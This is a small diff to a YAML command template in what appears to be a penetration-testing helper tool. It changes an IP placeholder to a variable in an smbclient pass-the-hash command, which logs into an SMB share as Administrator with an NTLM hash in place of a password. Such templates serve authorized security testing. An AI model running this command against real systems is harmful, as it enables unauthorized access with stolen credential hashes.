--- a/src/profi/templates/scripts/smbclient-pass-the-hash.yaml
+++ b/src/profi/templates/scripts/smbclient-pass-the-hash.yaml
@@ -6,4 +6,4 @@ metadata:
   author: "Unknown"
 
 content: |
-  smbclient \\\\<IP>\\<smb-folder> -U Administrator --pw-nt-hash <NTLM-hash>
+  smbclient \\\\$IP\\<smb-folder> -U Administrator --pw-nt-hash <NTLM-hash>
